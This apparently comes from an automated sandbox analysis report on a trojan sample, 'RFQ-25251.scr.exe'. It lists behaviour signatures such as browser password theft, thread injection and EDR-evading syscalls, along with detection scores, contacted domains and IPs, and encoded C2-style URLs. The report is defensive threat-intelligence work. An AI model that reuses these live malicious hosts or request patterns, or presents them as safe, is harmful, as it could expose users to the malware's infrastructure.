58 Tries to harvest and steal browser information (history, passwords, etc) 23->58 60 Modifies the context of a thread in another process (thread injection) 23->60 62 2 other signatures 23->62 26 ZkvvIsytMpWTrpZoKvbY.exe 23->26 injected 30 firefox.exe 23->30         started        process12 dnsIp13 38 www.fairmarty.top 203.161.46.103, 49736, 49737, 49738 VNPT-AS-VNVNPTCorpVN Malaysia 26->38 40 aprovapapafox.com 162.240.81.18, 49740, 49741, 49742 UNIFIEDLAYER-AS-1US United States 26->40 42 8 other IPs or domains 26->42 66 Found direct / indirect Syscall (likely to bypass EDR) 26->66 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RFQ-25251.scr.exe61%ReversingLabsByteCode-MSIL.Trojan.Remcos
                RFQ-25251.scr.exe37%VirustotalBrowse
                RFQ-25251.scr.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                www.maxiwalls.com1%VirustotalBrowse
                www.paydayloans3.shop1%VirustotalBrowse
                www.skibinscy-finanse.pl0%VirustotalBrowse
                aprovapapafox.com0%VirustotalBrowse
                parkingpage.namecheap.com0%VirustotalBrowse
                www.fairmarty.top1%VirustotalBrowse
                www.toyzonetshirts.com1%VirustotalBrowse
                www.www60270.xyz2%VirustotalBrowse
                www.colchondealquiler.com0%VirustotalBrowse
                www.onitsuka-ksa.com13%VirustotalBrowse
                lb.webnode.io0%VirustotalBrowse
                www.avoshield.com1%VirustotalBrowse
                www.valentinaetommaso.it1%VirustotalBrowse
                www.choosejungmann.com0%VirustotalBrowse
                www.solesense.pro1%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e9570%Avira URL Cloudsafe
                https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                https://assets.iv.lt/header.html0%Avira URL Cloudsafe
                https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e9570%Avira URL Cloudsafe
                https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                http://www.fairmarty.top/aleu/?Fb=1EzsQVnX0vVrGxBYNXB1u7fNxljhjRHJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpW9hrZ8kUbuN4/rBR3ZymMyy6TdBz3A==&Cvp=4jl0Z4R0O0%Avira URL Cloudsafe
                https://ogp.me/ns#0%Avira URL Cloudsafe
                http://www.solesense.pro/aleu/0%Avira URL Cloudsafe
                https://ogp.me/ns#2%VirustotalBrowse
                https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.js0%VirustotalBrowse
                https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.js0%Avira URL Cloudsafe
                https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsys0%Avira URL Cloudsafe
                https://d1di2lzuh97fh2.cloudfront.net/files/1a/1an/1anfpg.css?ph=cb3a78e9570%Avira URL Cloudsafe
                https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloud0%Avira URL Cloudsafe
                https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e9570%Avira URL Cloudsafe
                https://assets.iv.lt/header.html0%VirustotalBrowse
                http://www.solesense.pro/aleu/0%VirustotalBrowse
                https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=de0%Avira URL Cloudsafe
                https://events.webnode.com/projects/-/events/0%Avira URL Cloudsafe
                http://www.skibinscy-finanse.pl/aleu/?Fb=N0v49flUUQfEWOo/aE7OdIaJv4xdfmBs7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sM/a7W8oScpDHK4wfMzjdXHtYm8Gz2g==&Cvp=4jl0Z4R0O0%Avira URL Cloudsafe
                https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e9570%Avira URL Cloudsafe
                https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=de0%VirustotalBrowse
                http://www.83634.cn/aleu/0%Avira URL Cloudsafe
                https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsys0%VirustotalBrowse
                https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=cb3a78e9570%Avira URL Cloudsafe
                https://wnucetgswsjvfbno.app0%Avira URL Cloudsafe
                https://www.iv.lt/domenai/0%Avira URL Cloudsafe
                https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloud0%VirustotalBrowse
                https://events.webnode.com/projects/-/events/0%VirustotalBrowse
                https://assets.iv.lt/default.css0%Avira URL Cloudsafe
                http://www.83634.cn/aleu/0%VirustotalBrowse
                http://nginx.net/0%Avira URL Cloudsafe
                https://assets.iv.lt/images/icon.png0%Avira URL Cloudsafe
                http://fedoraproject.org/0%Avira URL Cloudsafe
                https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e9570%Avira URL Cloudsafe
                https://www.webnode.it/?utm_source=text&utm_medium=footer&utm_content=wnd2&utm_campaign=signature0%Avira URL Cloudsafe
                https://www.arsys.es/herramientas/sms?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=sms0%Avira URL Cloudsafe
                https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions0%Avira URL Cloudsafe
                https://assets.iv.lt/images/thumbnail.png0%Avira URL Cloudsafe
                https://www.iv.lt/duomenu-centras/0%Avira URL Cloudsafe
                https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backup0%Avira URL Cloudsafe
                https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hosting0%Avira URL Cloudsafe
                https://www.arsys.es/hosting/wordpress?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wordp0%Avira URL Cloudsafe
                https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e9570%Avira URL Cloudsafe
                http://www.skibinscy-finanse.pl/aleu/0%Avira URL Cloudsafe
                https://www.iv.lt/profesionalus-hostingas/0%Avira URL Cloudsafe
                https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominio0%Avira URL Cloudsafe
                http://www.paydayloans3.shop/aleu/?Fb=jXFvQTK4oWsNW5HaVP0aKlBegUUeN16TTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZmRruwwT7mrPw5MWe/TE7XFATw0m0gg==&Cvp=4jl0Z4R0O0%Avira URL Cloudsafe
                https://www.iv.lt/talpinimo-planai/0%Avira URL Cloudsafe
                http://www.valentinaetommaso.it/aleu/?Fb=qJYbYwaLgLDJAMSHMJQaEOr73chNsD5VMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjWe/ogXVMOXyO4l4P9y/SnxDkYImARg==&Cvp=4jl0Z4R0O0%Avira URL Cloudsafe
                https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resell0%Avira URL Cloudsafe
                https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=ssl0%Avira URL Cloudsafe
                https://www.valentinaetommaso.it/page-not-found-404/0%Avira URL Cloudsafe
                https://assets.iv.lt/footer.html0%Avira URL Cloudsafe
                http://www.aprovapapafox.com/aleu/?Fb=mEhw182mTcvL4X7W6yJhLslIcG+j3Kkb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5HrlDAC6es8J/4MGCSxvHU4H+D2Na9g==&Cvp=4jl0Z4R0O0%Avira URL Cloudsafe
                https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=cb3a78e9570%Avira URL Cloudsafe
                http://www.valentinaetommaso.it/aleu/0%Avira URL Cloudsafe
                https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vps0%Avira URL Cloudsafe
                https://d1di2lzuh97fh2.cloudfront.net0%Avira URL Cloudsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                https://www.iv.lt/neribotas-svetainiu-talpinimas/0%Avira URL Cloudsafe
                https://www.iv.lt/0%Avira URL Cloudsafe
                https://www.iv.lt/svetainiu-kurimo-irankis/0%Avira URL Cloudsafe
                https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendas0%Avira URL Cloudsafe
                http://www.83634.cn/aleu/?Fb=/mfxaTJBOgt3JDZkoxaXbiWRJO3cof11tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEsJ1bmNcNLMbEIClpI49SsaijuFrxzA==&Cvp=4jl0Z4R0O0%Avira URL Cloudsafe
                https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
                https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partners0%Avira URL Cloudsafe
                https://d1di2lzuh97fh2.cloudfront.net/files/0u/0ua/0ua55l.js?ph=cb3a78e9570%Avira URL Cloudsafe
                https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominios0%Avira URL Cloudsafe
                https://www.iv.lt/el-pasto-filtras/0%Avira URL Cloudsafe
                https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=cb3a78e9570%Avira URL Cloudsafe
                https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=seo0%Avira URL Cloudsafe
                https://www.iv.lt/vps-serveriai/0%Avira URL Cloudsafe
                https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e9570%Avira URL Cloudsafe
                http://www.colchondealquiler.com/aleu/?Fb=heiUU9lLv45IJG5Wd6LJBmuSZbtDNHx122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloo6X2S27Hq9j/bz05/C52hvbOe3CFZA==&Cvp=4jl0Z4R0O100%Avira URL Cloudmalware
                http://www.paydayloans3.shop/aleu/0%Avira URL Cloudsafe
                http://www.solesense.pro/aleu/?Fb=Fsk+9Ugrf6MFs9mchnETM+3QD2cthhCQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUE3Q4RMAOFSo2a4DyoUA+b+KE1mcO3A==&Cvp=4jl0Z4R0O0%Avira URL Cloudsafe
                http://www.colchondealquiler.com/aleu/100%Avira URL Cloudmalware
                https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo0%Avira URL Cloudsafe
                http://www.fairmarty.top/aleu/0%Avira URL Cloudsafe
                https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e9570%Avira URL Cloudsafe
                https://klientams.iv.lt/0%Avira URL Cloudsafe
                https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e9570%Avira URL Cloudsafe
                https://arsys.es/css/parking2.css0%Avira URL Cloudsafe
                https://www.webnode.com/it/?utm_source=text&amp;utm_medium=footer&amp;utm_content=wnd2&amp;utm_campa0%Avira URL Cloudsafe
                http://www.solesense.pro0%Avira URL Cloudsafe
                https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=re0%Avira URL Cloudsafe
                https://www.iv.lt/sertifikatai/0%Avira URL Cloudsafe
                http://www.aprovapapafox.com/aleu/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.maxiwalls.com
                		79.98.25.1
                		truetrueunknown
                www.skibinscy-finanse.pl
                		178.211.137.59
                		truetrueunknown
                www.paydayloans3.shop
                		64.190.62.22
                		truetrueunknown
                aprovapapafox.com
                		162.240.81.18
                		truetrueunknown
                parkingpage.namecheap.com
                		91.195.240.19
                		truetrueunknown
                vf3ba6qx.as22566.com
                		103.93.125.69
                		truetrue
                  		unknown
                  lb.webnode.io
                  		3.125.172.46
                  		truetrueunknown
                  fix01.pfw.djamxtvyk.cloudland3.com
                  		52.175.38.24
                  		truefalse
                    		unknown
                    www.colchondealquiler.com
                    		217.76.128.34
                    		truetrueunknown
                    www.fairmarty.top
                    		203.161.46.103
                    		truetrueunknown
                    www.theertyuiergthjk.homes
                    		unknown
                    		unknowntrue
                      		unknown
                      www.choosejungmann.com
                      		unknown
                      		unknowntrueunknown
                      www.toyzonetshirts.com
                      		unknown
                      		unknowntrueunknown
                      www.83634.cn
                      		unknown
                      		unknowntrue
                        		unknown
                        www.aprovapapafox.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.www60270.xyz
                          		unknown
                          		unknowntrueunknown
                          www.avoshield.com
                          		unknown
                          		unknowntrueunknown
                          www.polhi.lol
                          		unknown
                          		unknowntrue
                            		unknown
                            www.valentinaetommaso.it
                            		unknown
                            		unknowntrueunknown
                            www.onitsuka-ksa.com
                            		unknown
                            		unknowntrueunknown
                            www.solesense.pro
                            		unknown
                            		unknowntrueunknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.fairmarty.top/aleu/?Fb=1EzsQVnX0vVrGxBYNXB1u7fNxljhjRHJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpW9hrZ8kUbuN4/rBR3ZymMyy6TdBz3A==&Cvp=4jl0Z4R0Otrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.solesense.pro/aleu/true
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.skibinscy-finanse.pl/aleu/?Fb=N0v49flUUQfEWOo/aE7OdIaJv4xdfmBs7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sM/a7W8oScpDHK4wfMzjdXHtYm8Gz2g==&Cvp=4jl0Z4R0Otrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.83634.cn/aleu/true
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.skibinscy-finanse.pl/aleu/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.paydayloans3.shop/aleu/?Fb=jXFvQTK4oWsNW5HaVP0aKlBegUUeN16TTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZmRruwwT7mrPw5MWe/TE7XFATw0m0gg==&Cvp=4jl0Z4R0Otrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.valentinaetommaso.it/aleu/?Fb=qJYbYwaLgLDJAMSHMJQaEOr73chNsD5VMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjWe/ogXVMOXyO4l4P9y/SnxDkYImARg==&Cvp=4jl0Z4R0Otrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.aprovapapafox.com/aleu/?Fb=mEhw182mTcvL4X7W6yJhLslIcG+j3Kkb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5HrlDAC6es8J/4MGCSxvHU4H+D2Na9g==&Cvp=4jl0Z4R0Otrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.valentinaetommaso.it/aleu/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.83634.cn/aleu/?Fb=/mfxaTJBOgt3JDZkoxaXbiWRJO3cof11tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEsJ1bmNcNLMbEIClpI49SsaijuFrxzA==&Cvp=4jl0Z4R0Otrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.colchondealquiler.com/aleu/?Fb=heiUU9lLv45IJG5Wd6LJBmuSZbtDNHx122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloo6X2S27Hq9j/bz05/C52hvbOe3CFZA==&Cvp=4jl0Z4R0Otrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.paydayloans3.shop/aleu/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.solesense.pro/aleu/?Fb=Fsk+9Ugrf6MFs9mchnETM+3QD2cthhCQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUE3Q4RMAOFSo2a4DyoUA+b+KE1mcO3A==&Cvp=4jl0Z4R0Otrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.colchondealquiler.com/aleu/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.fairmarty.top/aleu/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.aprovapapafox.com/aleu/true
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabreplace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e957replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.iv.lt/header.htmlreplace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/ac/?q=replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ogp.me/ns#replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.jsreplace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsysreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/files/1a/1an/1anfpg.css?ph=cb3a78e957replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloudreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e957replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dereplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://events.webnode.com/projects/-/events/replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=cb3a78e957replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://wnucetgswsjvfbno.appreplace.exe, 0000000F.00000002.3741778004.0000000003E9C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000367C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.iv.lt/domenai/replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.iv.lt/default.cssreplace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://nginx.net/replace.exe, 0000000F.00000002.3741778004.0000000004676000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003E56000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.iv.lt/images/icon.pngfirefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://fedoraproject.org/replace.exe, 0000000F.00000002.3741778004.0000000004676000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003E56000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.webnode.it/?utm_source=text&utm_medium=footer&utm_content=wnd2&utm_campaign=signaturereplace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/herramientas/sms?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=smsreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutionsreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.iv.lt/images/thumbnail.pngfirefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchreplace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.iv.lt/duomenu-centras/replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backupreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hostingreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/hosting/wordpress?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wordpreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
